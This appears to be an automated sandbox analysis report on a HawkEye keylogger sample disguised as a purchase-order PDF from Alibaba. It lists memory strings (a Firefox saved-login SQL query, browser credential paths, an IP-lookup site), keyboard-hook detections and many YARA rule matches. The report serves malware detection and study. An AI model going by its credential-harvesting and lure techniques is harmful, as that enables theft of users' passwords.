Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.316835361.000000001DCF1000.00000004.00000001.sdmp, vbc.exe, 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, WindowsUpdate.exe, 00000008.00000002.308445225.000000001EE00000.00000004.00000001.sdmp, WindowsUpdate.exe, 0000000B.00000002.312787394.000000001EE40000.00000004.00000001.sdmp | String found in binary or memory: @nss3.dllSOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe%programfiles%\Sea MonkeySOFTWARE\Mozillamozilla%s\binPathToExe%programfiles%\Mozilla FirefoxSELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins.---signons.txtsignons2.txtsignons3.txtsignons.sqlitenetmsg.dllUnknown Error\Error %d: %seditkernel32.dll... open %2.2X %s (%s)Microsoft_WinInetMicrosoft_WinInet_u7@dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
Source: WindowsUpdate.exe | String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: vbc.exe, 00000003.00000003.245528532.00000000008BC000.00000004.00000001.sdmp | String found in binary or memory: s://www.microsoft.com/en-us/welcomeie11/https://www.microsoft.com/en-us/edge?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edgehttps://www.microsoft.com/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/edge/https://www.microsoft.com/en-us/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edge/https://www.google.com/chrome/https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0https://www.google.com/chrome/thank-you.htmlhttps://www.bing.com/search?q=chrome+download&src=IE-SearchBox&FORM=IESR4A&pc=EUPP_https://www.bing.com/searchhttps://go.microsoft.com/fwlink/?LinkId=838604https://go.microsoft.com/fwlink/https://go.microsoft.com/fwlink/p/?LinkId=255141https://go.microsoft.com/fwlink/p/https://go.microsoft.com/fwlink/?LinkId=517287res://C:\Windows\system32\mmcndmgr.dll/views.htmhttp://www.msn.com/?ocid=iehphttp://www.msn.com/http://www.msn.com/de-ch/?ocid=iehphttp://www.msn.com/de-ch/http://go.microsoft.com/fwlink/?LinkId=838604http://go.microsoft.com/fwlink/http://go.microsoft.com/fwlink/p/?LinkId=255141http://go.microsoft.com/fwlink/p/https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login. equals www.facebook.com (Facebook)
Source: vbc.exe, 00000003.00000003.245528532.00000000008BC000.00000004.00000001.sdmp | String found in binary or memory: s://www.microsoft.com/en-us/welcomeie11/https://www.microsoft.com/en-us/edge?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edgehttps://www.microsoft.com/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/edge/https://www.microsoft.com/en-us/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edge/https://www.google.com/chrome/https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0https://www.google.com/chrome/thank-you.htmlhttps://www.bing.com/search?q=chrome+download&src=IE-SearchBox&FORM=IESR4A&pc=EUPP_https://www.bing.com/searchhttps://go.microsoft.com/fwlink/?LinkId=838604https://go.microsoft.com/fwlink/https://go.microsoft.com/fwlink/p/?LinkId=255141https://go.microsoft.com/fwlink/p/https://go.microsoft.com/fwlink/?LinkId=517287res://C:\Windows\system32\mmcndmgr.dll/views.htmhttp://www.msn.com/?ocid=iehphttp://www.msn.com/http://www.msn.com/de-ch/?ocid=iehphttp://www.msn.com/de-ch/http://go.microsoft.com/fwlink/?LinkId=838604http://go.microsoft.com/fwlink/http://go.microsoft.com/fwlink/p/?LinkId=255141http://go.microsoft.com/fwlink/p/https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login. equals www.yahoo.com (Yahoo)
              Source: unknownDNS traffic detected: queries for: whatismyipaddress.com
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.316835361.000000001DCF1000.00000004.00000001.sdmp, WindowsUpdate.exe, 00000008.00000002.308445225.000000001EE00000.00000004.00000001.sdmp, WindowsUpdate.exe, 0000000B.00000002.312787394.000000001EE40000.00000004.00000001.sdmp | String found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000003.222007881.000000001F12D000.00000004.00000001.sdmp | String found in binary or memory: http://en.w
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.317453803.000000001F290000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
              Source: WindowsUpdate.exe, 00000008.00000002.308158001.000000001CC12000.00000004.00000001.sdmp, WindowsUpdate.exe, 0000000B.00000002.312377035.000000001CCB1000.00000004.00000001.sdmp | String found in binary or memory: http://foo.com/fooT
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.316835361.000000001DCF1000.00000004.00000001.sdmp, WindowsUpdate.exe, 00000008.00000002.308445225.000000001EE00000.00000004.00000001.sdmp, WindowsUpdate.exe, 0000000B.00000002.312787394.000000001EE40000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.comodoca.com0
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.313417162.000000001CCF1000.00000004.00000001.sdmp | String found in binary or memory: http://whatismyipaddress.com
              Source: WindowsUpdate.exe | String found in binary or memory: http://whatismyipaddress.com/
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.316835361.000000001DCF1000.00000004.00000001.sdmp, WindowsUpdate.exe, 00000008.00000002.308445225.000000001EE00000.00000004.00000001.sdmp, WindowsUpdate.exe, 0000000B.00000002.312787394.000000001EE40000.00000004.00000001.sdmp | String found in binary or memory: http://whatismyipaddress.com/-
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.317453803.000000001F290000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000003.224519756.000000001F137000.00000004.00000001.sdmp | String found in binary or memory: http://www.ascendercorp.com/typedesigners.html
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000003.223535347.000000001F138000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.com
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000003.223629764.000000001F138000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.com.12
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000003.223629764.000000001F138000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.comItaf
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000003.223629764.000000001F138000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.comeci
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000003.223535347.000000001F138000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.comitk.
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.317453803.000000001F290000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000003.223629764.000000001F138000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.comypo
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.317281962.000000001F120000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.317453803.000000001F290000.00000002.00000001.sdmp, PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000003.228030667.000000001F12D000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.317453803.000000001F290000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.317453803.000000001F290000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.317453803.000000001F290000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.317453803.000000001F290000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.317453803.000000001F290000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000003.228030667.000000001F12D000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersB
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.317453803.000000001F290000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.317281962.000000001F120000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.comalic
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.317281962.000000001F120000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.comceco
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.317453803.000000001F290000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.317453803.000000001F290000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000003.222855521.000000001F152000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn(
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.317453803.000000001F290000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.317453803.000000001F290000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000003.222855521.000000001F152000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cnBm
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000003.222855521.000000001F152000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cnxmQ
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.317453803.000000001F290000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.317453803.000000001F290000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.317453803.000000001F290000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.317453803.000000001F290000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000003.227248438.000000001F12F000.00000004.00000001.sdmp | String found in binary or memory: http://www.monotype.
              Source: WindowsUpdate.exe, 0000000B.00000002.312787394.000000001EE40000.00000004.00000001.sdmp | String found in binary or memory: http://www.nirsoft.net/
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.317453803.000000001F290000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.317453803.000000001F290000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.317453803.000000001F290000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.317453803.000000001F290000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.317453803.000000001F290000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.317453803.000000001F290000.00000002.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.317453803.000000001F290000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
              Source: WindowsUpdate.exe | String found in binary or memory: https://login.yahoo.com/config/login
              Source: WindowsUpdate.exe | String found in binary or memory: https://www.google.com/accounts/servicelogin

              Key, Mouse, Clipboard, Microphone and Screen Capturing:

              Yara detected HawkEye Keylogger
              Source: Yara match | File source: 00000008.00000002.308445225.000000001EE00000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara match | File source: 00000008.00000002.305904316.000000001C5F0000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara match | File source: 00000008.00000002.308219748.000000001DBD1000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara match | File source: 0000000B.00000002.312787394.000000001EE40000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara match | File source: 0000000B.00000002.312583133.000000001DCB1000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara match | File source: 0000000B.00000002.301969493.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara match | File source: 00000008.00000002.300925836.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara match | File source: 0000000B.00000002.312957269.000000001EED2000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000002.316835361.000000001DCF1000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000002.301261564.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000002.317001771.000000001EEAE000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000002.317140638.000000001EFE2000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000002.317057911.000000001EF40000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000002.311897650.000000001C6F0000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara match | File source: 0000000B.00000002.309857450.000000001C5F0000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara match | File source: 00000008.00000002.305233571.000000001AD92000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000002.313417162.000000001CCF1000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: WindowsUpdate.exe PID: 4848, type: MEMORY
              Source: Yara match | File source: Process Memory Space: WindowsUpdate.exe PID: 6328, type: MEMORY
              Source: Yara match | File source: Process Memory Space: PO 2010029_pdf Quotation from Alibaba Ale.exe PID: 2148, type: MEMORY
              Source: Yara match | File source: 11.2.WindowsUpdate.exe.1c5f0000.3.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1efe0000.6.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1c6f0000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 8.2.WindowsUpdate.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 11.2.WindowsUpdate.exe.1ee40000.4.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 8.2.WindowsUpdate.exe.1ad90000.2.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1ef40000.5.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1c6f0000.4.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 11.2.WindowsUpdate.exe.1ee40000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 11.2.WindowsUpdate.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1ef40000.5.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 8.2.WindowsUpdate.exe.1c5f0000.4.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 8.2.WindowsUpdate.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 8.2.WindowsUpdate.exe.1ee00000.5.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 8.2.WindowsUpdate.exe.1c5f0000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 11.2.WindowsUpdate.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 11.2.WindowsUpdate.exe.1eed0000.5.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 11.2.WindowsUpdate.exe.1c5f0000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 8.2.WindowsUpdate.exe.1ee00000.5.raw.unpack, type: UNPACKEDPE
              Contains functionality to log keystrokes (.Net Source)
              Source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1efe0000.6.unpack, Form1.cs | .Net Code: HookKeyboard
              Source: 8.2.WindowsUpdate.exe.1ad90000.2.unpack, Form1.cs | .Net Code: HookKeyboard
              Source: 11.2.WindowsUpdate.exe.1eed0000.5.unpack, Form1.cs | .Net Code: HookKeyboard
              Installs a global keyboard hook
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exe | Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exe
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 2_2_0040AC8A GetTempPathA,GetWindowsDirectoryA,GetTempFileNameA,OpenClipboard,GetLastError,DeleteFileA, | 2_2_0040AC8A
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.301871315.000000000164A000.00000004.00000020.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

              System Summary:

              Malicious sample detected (through community Yara rule)
              Source: 00000008.00000002.308445225.000000001EE00000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
              Source: 00000008.00000002.308445225.000000001EE00000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
              Source: 00000008.00000002.305904316.000000001C5F0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
              Source: 00000008.00000002.305904316.000000001C5F0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
              Source: 00000008.00000002.308219748.000000001DBD1000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
              Source: 00000008.00000002.308219748.000000001DBD1000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
              Source: 0000000B.00000002.312787394.000000001EE40000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
              Source: 0000000B.00000002.312787394.000000001EE40000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
              Source: 0000000B.00000002.312583133.000000001DCB1000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
              Source: 0000000B.00000002.312583133.000000001DCB1000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
              Source: 0000000B.00000002.301969493.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
              Source: 0000000B.00000002.301969493.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
              Source: 00000008.00000002.300925836.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
              Source: 00000008.00000002.300925836.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
              Source: 0000000B.00000002.312957269.000000001EED2000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
              Source: 0000000B.00000002.312957269.000000001EED2000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
              Source: 00000000.00000002.316835361.000000001DCF1000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
              Source: 00000000.00000002.316835361.000000001DCF1000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
              Source: 00000000.00000002.301261564.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
              Source: 00000000.00000002.301261564.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
              Source: 00000000.00000002.317001771.000000001EEAE000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
              Source: 00000000.00000002.317001771.000000001EEAE000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
              Source: 00000000.00000002.317140638.000000001EFE2000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
              Source: 00000000.00000002.317140638.000000001EFE2000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
              Source: 00000000.00000002.317057911.000000001EF40000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
              Source: 00000000.00000002.317057911.000000001EF40000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
              Source: 00000000.00000002.311897650.000000001C6F0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
              Source: 00000000.00000002.311897650.000000001C6F0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
              Source: 0000000B.00000002.309857450.000000001C5F0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
              Source: 0000000B.00000002.309857450.000000001C5F0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
              Source: 00000008.00000002.305233571.000000001AD92000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
              Source: 00000008.00000002.305233571.000000001AD92000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
              Source: 00000000.00000002.313417162.000000001CCF1000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
              Source: 00000000.00000002.313417162.000000001CCF1000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
              Source: 11.2.WindowsUpdate.exe.1c5f0000.3.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
              Source: 11.2.WindowsUpdate.exe.1c5f0000.3.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
              Source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1efe0000.6.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
              Source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1efe0000.6.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
              Source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1c6f0000.4.raw.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
              Source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1c6f0000.4.raw.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
              Source: 8.2.WindowsUpdate.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
              Source: 8.2.WindowsUpdate.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
              Source: 11.2.WindowsUpdate.exe.1ee40000.4.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
              Source: 8.2.WindowsUpdate.exe.1ad90000.2.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
              Source: 11.2.WindowsUpdate.exe.1ee40000.4.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
              Source: 8.2.WindowsUpdate.exe.1ad90000.2.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
              Source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1ef40000.5.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
              Source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1ef40000.5.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
              Source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1c6f0000.4.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
              Source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1c6f0000.4.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
              Source: 11.2.WindowsUpdate.exe.1ee40000.4.raw.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
              Source: 11.2.WindowsUpdate.exe.1ee40000.4.raw.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
              Source: 11.2.WindowsUpdate.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
              Source: 11.2.WindowsUpdate.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
              Source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1ef40000.5.raw.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
              Source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1ef40000.5.raw.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
              Source: 8.2.WindowsUpdate.exe.1c5f0000.4.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
              Source: 8.2.WindowsUpdate.exe.1c5f0000.4.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
              Source: 8.2.WindowsUpdate.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
